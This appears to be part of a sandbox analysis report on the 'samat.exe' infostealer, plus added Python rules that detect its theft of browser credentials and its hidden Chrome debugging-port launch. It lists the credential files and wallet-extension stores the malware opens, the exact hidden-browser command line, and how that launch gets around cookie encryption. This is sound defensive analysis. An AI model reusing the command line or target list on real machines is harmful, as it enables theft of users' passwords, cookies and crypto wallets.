Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E5C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 7_2_00007FF7E12E5C00
Source: C:\Windows\System32\dxdiag.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OllyDbg.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Wireshark.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ollydbg.exe

Stealing of Sensitive Information

Source: Yara match File source: 2.2.skotes.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.6c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.skotes.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2152067719.00000000007A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2104456781.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2063442890.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2148194212.00000000007A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2662182646.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2111686046.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2104419686.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: samat.exe PID: 6120, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\khpkpbbcccdmmclmpigdgddabeilkdpd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mdjmfdffdcmnoblignmgpommbefadffd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
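The file opens above are the stealer's collection phase: the Chromium credential stores (Login Data, Web Data), the Firefox key store (key4.db) and a long list of directories under Local Extension Settings, each named by a 32-character Chrome extension ID, which is where extension-held secrets such as wallet state live. Added triage example, not code from the report or from the sample: a Python rule that reads (process, path) "File opened" pairs and flags any process other than the owning browser that reaches into these stores. The event shape, the category names, the expected-owner table and the sample events (built from the paths listed above plus one benign chrome.exe open and one non-browser path) are assumptions of this example.

```python
import ntpath
import re
from collections import defaultdict

# Profile roots and the browser process that legitimately opens them (assumed table).
EXPECTED_OWNER = {
    "\\google\\chrome\\user data\\": "chrome.exe",
    "\\microsoft\\edge\\user data\\": "msedge.exe",
    "\\mozilla\\firefox\\": "firefox.exe",
}
CHROMIUM_SECRETS = {"login data", "web data", "cookies", "local state"}
FIREFOX_SECRETS = {"key4.db", "key3.db", "logins.json", "cert9.db", "cookies.sqlite", "profiles.ini"}
EXTENSION_STORES = {"local extension settings", "sync extension settings"}
EXTENSION_ID = re.compile(r"[a-p]{32}")  # Chrome extension IDs: 32 chars, alphabet a-p

# Constructed sample of (process, path) pairs: paths taken from the report's list,
# plus a benign open by chrome.exe itself and one non-browser path as negatives.
STEALER = "C:\\Users\\user\\AppData\\Local\\Temp\\1008029001\\samat.exe"
CHROME_PROFILE = "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
SAMPLE_FILE_EVENTS = [
    (STEALER, CHROME_PROFILE + "\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),
    (STEALER, CHROME_PROFILE + "\\Web Data"),
    (STEALER, CHROME_PROFILE + "\\Login Data"),
    (STEALER, "C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data"),
    (STEALER, "C:\\Users\\user\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\v6zchhhv.default-release\\key4.db"),
    (STEALER, CHROME_PROFILE + "\\Sync Extension Settings\\bhghoamapcdpbohphigoooaddinpkbai"),
    (STEALER, CHROME_PROFILE),
    ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", CHROME_PROFILE + "\\Login Data"),
    (STEALER, "C:\\Users\\user\\AppData\\Local\\Temp\\_MEI52282\\win32"),
]


def classify_path(path):
    """Return (owner_process, category, extension_id) for a browser-profile path, else None."""
    p = path.lower()
    owner = next((proc for root, proc in EXPECTED_OWNER.items() if root in p), None)
    if owner is None:
        return None
    base = ntpath.basename(p)                    # ntpath so backslashes split on any host OS
    parent = ntpath.basename(ntpath.dirname(p))
    if owner == "firefox.exe":
        return owner, ("credential_store" if base in FIREFOX_SECRETS else "profile_other"), None
    if parent in EXTENSION_STORES and EXTENSION_ID.fullmatch(base):
        return owner, "extension_storage", base
    if base in CHROMIUM_SECRETS:
        return owner, "credential_store", None
    return owner, "profile_other", None


def summarize(events):
    """Group browser-artifact opens by process, skipping the browser that owns the profile."""
    out = defaultdict(lambda: {"files": 0, "categories": set(), "extension_ids": set()})
    for process, path in events:
        hit = classify_path(path)
        if hit is None:
            continue
        owner, category, ext_id = hit
        if ntpath.basename(process.lower()) == owner:
            continue                             # the browser reading its own profile is normal
        rec = out[process]
        rec["files"] += 1
        rec["categories"].add(category)
        if ext_id:
            rec["extension_ids"].add(ext_id)
    return dict(out)


def alerts(events):
    """One line per foreign process that read credential stores or extension storage."""
    lines = []
    for process, rec in summarize(events).items():
        if rec["categories"] & {"credential_store", "extension_storage"}:
            lines.append(f"{process}: {rec['files']} browser artifact opens, "
                         f"categories={sorted(rec['categories'])}, "
                         f"extension stores={len(rec['extension_ids'])}")
    return lines


if __name__ == "__main__":
    for line in alerts(SAMPLE_FILE_EVENTS):
        print(line)
```

The owner check is what keeps this quiet in production: the browser opens these files constantly, so the rule only fires for a non-browser image, and the extension-ID regex keeps it from matching arbitrary directory names. Resolving which wallet or password manager each ID belongs to is a separate enrichment step and is deliberately not hard-coded here.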

Remote Access Functionality

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Source: Yara match File source: 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: samat.exe PID: 6120, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
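The chrome.exe launch recorded above (--remote-debugging-port, --remote-allow-origins=*, the user's real --profile-directory, and the window pushed to 10000,10000 at 1x1) is the pattern stealers use to open a DevTools endpoint on the victim's own browser: with any origin allowed, the stealer connects to the local websocket and asks Chrome for cookies and storage that Chrome has already decrypted in memory, which is how it sidesteps Application-Bound Encryption of the on-disk stores. Added detection example, not code from the report or the sample: a Python rule over process-creation events (the field names follow Sysmon Event ID 1 but are an assumption here) that scores such launches. The first sample event reproduces the command line above; the other two are constructed benign launches.

```python
import re

# Directories a stager typically runs from; parent processes living here raise the score.
STAGING_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\", "\\programdata\\")
BROWSER_IMAGES = ("chrome.exe", "msedge.exe", "brave.exe", "chromium.exe")

# Constructed sample process-creation events. Event 0 is the launch from this report;
# events 1 and 2 are hypothetical benign launches (normal user start, test automation).
SAMPLE_EVENTS = [
    {
        "parent_image": "C:\\Users\\user\\AppData\\Local\\Temp\\1008029001\\samat.exe",
        "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
        "command_line": ('"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" '
                         "--remote-debugging-port=9876 --profile-directory=Default "
                         "--remote-allow-origins=* --window-position=10000,10000 "
                         "--window-size=1,1 --disable-gpu --no-sandbox"),
    },
    {
        "parent_image": "C:\\Windows\\explorer.exe",
        "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
        "command_line": '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --profile-directory=Default',
    },
    {
        "parent_image": "C:\\Users\\dev\\tools\\selenium-runner.exe",
        "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
        "command_line": ('"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" '
                         "--remote-debugging-port=9222 --user-data-dir=C:\\tmp\\profile"),
    },
]

SWITCH = re.compile(r"--([\w-]+)(?:=(\S+))?")


def parse_switches(command_line):
    """Map every --switch[=value] on a Chromium command line to its value (None when bare)."""
    return {name: (value or None) for name, value in SWITCH.findall(command_line)}


def window_hidden(sw):
    """True when the launch is headless, moves the window far off-screen, or shrinks it to nothing."""
    if any(name.startswith("headless") for name in sw):
        return True
    try:
        pos = sw.get("window-position")
        if pos and any(abs(int(c)) >= 5000 for c in pos.split(",")):
            return True
        size = sw.get("window-size")
        if size and all(int(c) <= 10 for c in size.split(",")):
            return True
    except ValueError:
        pass
    return False


def assess_chrome_launch(event):
    """None for launches without a DevTools endpoint; otherwise a severity and the indicators seen."""
    if not event["image"].lower().endswith(BROWSER_IMAGES):
        return None
    sw = parse_switches(event["command_line"])
    if "remote-debugging-port" not in sw and "remote-debugging-pipe" not in sw:
        return None
    indicators = ["DevTools endpoint exposed (--remote-debugging-port / --remote-debugging-pipe)"]
    if sw.get("remote-allow-origins") == "*":
        indicators.append("--remote-allow-origins=*: any local client may attach to the DevTools websocket")
    if window_hidden(sw):
        indicators.append("window hidden from the user (off-screen, 1x1 or headless)")
    if "profile-directory" in sw and "user-data-dir" not in sw:
        indicators.append("opens the user's real profile, so live cookies and logins are in reach")
    if any(d in event["parent_image"].lower() for d in STAGING_DIRS):
        indicators.append("parent process runs from a user-writable staging directory")
    severity = {1: "low", 2: "medium"}.get(len(indicators), "high")
    return {"severity": severity, "indicators": indicators}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["parent_image"], "->", assess_chrome_launch(ev))
```

Test automation and debugging tools also start Chrome with a debugging port, which is why the port alone scores low; the combination of a wildcard origin, a hidden window and the user's live profile is what separates a cookie theft from a Selenium run. A companion network rule is a loopback connection to the chosen port from the same parent process.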